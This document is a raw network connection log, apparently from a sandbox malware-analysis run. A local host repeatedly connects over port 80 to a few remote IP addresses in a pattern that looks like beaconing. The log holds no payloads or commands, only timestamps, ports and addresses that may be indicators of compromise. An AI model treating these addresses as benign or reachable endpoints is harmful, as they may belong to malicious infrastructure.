Jul 3, 2024 18:09:07.577910900 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.577923059 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.577924013 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.577935934 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.577940941 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.577954054 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.577959061 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.577966928 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.577985048 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.577992916 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.577997923 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.578023911 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.578043938 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.578146935 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.578157902 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.578191042 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.578205109 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.578207016 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.578218937 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.578247070 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.578267097 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.578318119 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.578336000 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.578346968 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.578358889 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.578362942 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.578373909 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.578388929 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.578408957 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.578424931 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.578551054 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.578562975 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.578573942 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.578587055 CEST	80	62923	77.91.77.81	192.168.2.6
Jul 3, 2024 18:09:07.578608990 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.578608990 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:07.578634977 CEST	62923	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:09:08.315344095 CEST	62922	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:08.315635920 CEST	62924	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:08.320441961 CEST	80	62924	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:08.320524931 CEST	62924	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:08.320811033 CEST	80	62922	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:08.320910931 CEST	62922	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:08.323088884 CEST	62925	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:09:08.323767900 CEST	62924	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:08.327915907 CEST	80	62925	85.28.47.4	192.168.2.6
Jul 3, 2024 18:09:08.328011036 CEST	62925	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:09:08.328325033 CEST	62925	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:09:08.329828024 CEST	80	62924	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:08.333089113 CEST	80	62925	85.28.47.4	192.168.2.6
Jul 3, 2024 18:09:08.940884113 CEST	80	62925	85.28.47.4	192.168.2.6
Jul 3, 2024 18:09:08.941032887 CEST	62925	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:09:09.019506931 CEST	80	62924	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:09.022176027 CEST	62924	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:09.136493921 CEST	62924	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:09.136791945 CEST	62926	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:09.141640902 CEST	80	62926	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:09.141748905 CEST	62926	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:09.141840935 CEST	62926	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:09.142107010 CEST	80	62924	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:09.142159939 CEST	62924	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:09.146606922 CEST	80	62926	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:09.857094049 CEST	80	62926	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:09.857276917 CEST	62926	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:09.857814074 CEST	62926	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:09.862643957 CEST	80	62926	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:10.093225956 CEST	80	62926	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:10.096275091 CEST	62926	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:10.199465036 CEST	62926	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:10.199850082 CEST	62927	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:10.205374002 CEST	80	62927	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:10.205498934 CEST	62927	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:10.205564022 CEST	80	62926	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:10.205610037 CEST	62927	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:10.205636024 CEST	62926	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:10.211397886 CEST	80	62927	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:10.690840960 CEST	62925	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:09:10.908123970 CEST	80	62927	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:10.908184052 CEST	62927	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:10.908958912 CEST	62927	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:10.914366961 CEST	80	62927	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:11.130245924 CEST	80	62927	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:11.132251978 CEST	62927	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:11.245740891 CEST	62927	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:11.246045113 CEST	62928	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:11.251013994 CEST	80	62928	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:11.251327038 CEST	80	62927	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:11.251425982 CEST	62927	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:11.251581907 CEST	62928	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:11.251581907 CEST	62928	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:11.256501913 CEST	80	62928	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:11.959661961 CEST	80	62928	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:11.960424900 CEST	62928	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:11.960980892 CEST	62928	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:11.965779066 CEST	80	62928	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:12.174721956 CEST	80	62928	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:12.174916029 CEST	62928	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:12.277312040 CEST	62928	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:12.277559042 CEST	62929	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:12.282568932 CEST	80	62929	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:12.282664061 CEST	62929	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:12.282829046 CEST	80	62928	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:12.282835960 CEST	62929	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:12.282875061 CEST	62928	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:12.287791967 CEST	80	62929	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:12.994389057 CEST	80	62929	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:12.994486094 CEST	62929	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:12.995392084 CEST	62929	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:13.000253916 CEST	80	62929	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:13.216878891 CEST	80	62929	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:13.216945887 CEST	62929	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:13.326380968 CEST	62929	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:13.326662064 CEST	62930	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:13.331492901 CEST	80	62929	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:13.331552029 CEST	62929	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:13.331624031 CEST	80	62930	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:13.331690073 CEST	62930	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:13.331808090 CEST	62930	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:13.336570024 CEST	80	62930	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:14.023633957 CEST	80	62930	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:14.023736000 CEST	62930	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:14.024416924 CEST	62930	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:14.032296896 CEST	80	62930	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:14.242964983 CEST	80	62930	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:14.243102074 CEST	62930	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:14.355173111 CEST	62930	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:14.355705976 CEST	62931	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:14.360769987 CEST	80	62930	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:14.360821009 CEST	62930	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:14.362204075 CEST	80	62931	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:14.362266064 CEST	62931	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:14.362386942 CEST	62931	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:14.368321896 CEST	80	62931	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:15.056071043 CEST	80	62931	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:15.056139946 CEST	62931	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:15.056849003 CEST	62931	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:15.063616037 CEST	80	62931	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:15.278609037 CEST	80	62931	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:15.278733015 CEST	62931	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:15.386782885 CEST	62931	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:15.387207985 CEST	62932	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:15.392949104 CEST	80	62932	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:15.393074036 CEST	62932	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:15.393364906 CEST	80	62931	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:15.393446922 CEST	62931	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:15.393549919 CEST	62932	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:15.399693966 CEST	80	62932	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:16.075664043 CEST	80	62932	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:16.075738907 CEST	62932	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:16.076412916 CEST	62932	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:16.081401110 CEST	80	62932	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:16.289328098 CEST	80	62932	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:16.289434910 CEST	62932	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:16.402187109 CEST	62932	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:16.402494907 CEST	62933	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:16.407526970 CEST	80	62933	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:16.407598972 CEST	80	62932	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:16.407607079 CEST	62933	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:16.407644033 CEST	62932	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:16.407810926 CEST	62933	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:16.412632942 CEST	80	62933	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:17.675995111 CEST	80	62933	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:17.676101923 CEST	62933	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:17.676943064 CEST	62933	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:17.678174973 CEST	80	62933	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:17.678253889 CEST	62933	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:17.679965973 CEST	80	62933	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:17.680015087 CEST	62933	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:17.681827068 CEST	80	62933	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:17.898384094 CEST	80	62933	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:17.898458958 CEST	62933	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:18.011548042 CEST	62933	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:18.011853933 CEST	62934	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:18.017646074 CEST	80	62933	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:18.017662048 CEST	80	62934	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:18.017741919 CEST	62933	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:18.017779112 CEST	62934	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:18.017935038 CEST	62934	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:18.022635937 CEST	80	62934	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:18.694540977 CEST	80	62934	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:18.694603920 CEST	62934	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:18.695369959 CEST	62934	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:18.700191975 CEST	80	62934	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:18.908742905 CEST	80	62934	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:18.908818960 CEST	62934	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:19.011539936 CEST	62934	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:19.011888027 CEST	62936	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:19.016803026 CEST	80	62936	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:19.016897917 CEST	62936	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:19.017062902 CEST	62936	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:19.017832994 CEST	80	62934	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:19.017887115 CEST	62934	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:19.021811962 CEST	80	62936	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:19.698211908 CEST	80	62936	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:19.698297024 CEST	62936	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:19.699687958 CEST	62936	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:19.705615997 CEST	80	62936	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:19.915069103 CEST	80	62936	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:19.915162086 CEST	62936	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:20.027113914 CEST	62936	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:20.027503014 CEST	62937	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:20.032267094 CEST	80	62936	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:20.032330990 CEST	62936	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:20.032538891 CEST	80	62937	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:20.032617092 CEST	62937	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:20.032701969 CEST	62937	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:20.037899971 CEST	80	62937	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:20.720972061 CEST	80	62937	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:20.721069098 CEST	62937	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:20.736937046 CEST	62937	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:20.741723061 CEST	80	62937	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:21.238765001 CEST	80	62937	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:21.238831043 CEST	62937	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:21.239487886 CEST	80	62937	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:21.239546061 CEST	62937	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:21.358630896 CEST	62937	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:21.358817101 CEST	62938	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:21.363688946 CEST	80	62938	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:21.363778114 CEST	62938	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:21.363918066 CEST	62938	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:21.364132881 CEST	80	62937	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:21.366184950 CEST	62937	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:21.369889021 CEST	80	62938	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:22.062084913 CEST	80	62938	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:22.062659979 CEST	62938	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:22.065663099 CEST	62938	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:22.070405960 CEST	80	62938	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:22.282608032 CEST	80	62938	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:22.282702923 CEST	62938	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:22.386437893 CEST	62938	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:22.386785030 CEST	62939	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:22.393623114 CEST	80	62938	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:22.393639088 CEST	80	62939	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:22.393704891 CEST	62938	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:22.393743992 CEST	62939	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:22.393872976 CEST	62939	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:22.398670912 CEST	80	62939	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:23.089390993 CEST	80	62939	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:23.089457035 CEST	62939	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:23.090032101 CEST	62939	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:23.095475912 CEST	80	62939	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:23.312191963 CEST	80	62939	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:23.312256098 CEST	62939	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:23.420372963 CEST	62939	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:23.420694113 CEST	62940	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:23.425621986 CEST	80	62940	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:23.425635099 CEST	80	62939	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:23.425725937 CEST	62939	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:23.425733089 CEST	62940	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:23.425834894 CEST	62940	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:23.430624008 CEST	80	62940	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:24.470679998 CEST	80	62940	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:24.470783949 CEST	62940	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:24.471427917 CEST	62940	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:24.473252058 CEST	80	62940	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:24.473324060 CEST	62940	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:24.476447105 CEST	80	62940	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:25.045638084 CEST	80	62940	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:25.045751095 CEST	62940	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:25.046993017 CEST	80	62940	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:25.047075033 CEST	62940	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:25.152101994 CEST	62940	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:25.152502060 CEST	62941	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:25.159677029 CEST	80	62941	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:25.159792900 CEST	62941	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:25.159951925 CEST	62941	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:25.160275936 CEST	80	62940	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:25.160332918 CEST	62940	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:25.165339947 CEST	80	62941	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:25.840718985 CEST	80	62941	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:25.840804100 CEST	62941	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:25.841485977 CEST	62941	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:25.846332073 CEST	80	62941	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:26.054505110 CEST	80	62941	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:26.054629087 CEST	62941	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:26.167866945 CEST	62941	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:26.168153048 CEST	62942	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:26.172957897 CEST	80	62941	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:26.172998905 CEST	80	62942	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:26.173032045 CEST	62941	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:26.173078060 CEST	62942	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:26.173286915 CEST	62942	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:26.178004026 CEST	80	62942	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:26.878729105 CEST	80	62942	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:26.878854990 CEST	62942	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:26.898456097 CEST	62942	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:26.903266907 CEST	80	62942	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:27.121310949 CEST	80	62942	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:27.121437073 CEST	62942	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:27.235198975 CEST	62942	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:27.235987902 CEST	62943	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:27.542093992 CEST	62942	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:27.598630905 CEST	80	62943	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:27.598649025 CEST	80	62942	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:27.598782063 CEST	62943	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:27.599843979 CEST	80	62942	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:27.599910975 CEST	62942	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:27.602220058 CEST	62943	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:27.609883070 CEST	80	62943	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:28.290934086 CEST	80	62943	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:28.291105986 CEST	62943	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:28.292192936 CEST	62943	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:28.296983004 CEST	80	62943	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:28.507081032 CEST	80	62943	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:28.507194996 CEST	62943	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:28.620924950 CEST	62943	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:28.621299028 CEST	62945	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:28.626219988 CEST	80	62943	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:28.626238108 CEST	80	62945	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:28.626277924 CEST	62943	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:28.626318932 CEST	62945	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:28.626436949 CEST	62945	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:28.631135941 CEST	80	62945	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:29.316668034 CEST	80	62945	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:29.316750050 CEST	62945	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:29.317624092 CEST	62945	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:29.322371006 CEST	80	62945	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:29.533479929 CEST	80	62945	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:29.533538103 CEST	62945	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:29.636590958 CEST	62945	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:29.636892080 CEST	62946	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:29.641697884 CEST	80	62946	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:29.641777992 CEST	62946	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:29.641940117 CEST	62946	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:29.642200947 CEST	80	62945	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:29.642254114 CEST	62945	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:29.646756887 CEST	80	62946	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:30.327357054 CEST	80	62946	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:30.327575922 CEST	62946	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:30.328197002 CEST	62946	80	192.168.2.6	77.91.77.82
Jul 3, 2024 18:09:30.332948923 CEST	80	62946	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:30.543145895 CEST	80	62946	77.91.77.82	192.168.2.6
Jul 3, 2024 18:09:30.543215036 CEST	62946	80	192.168.2.6	77.91.77.82
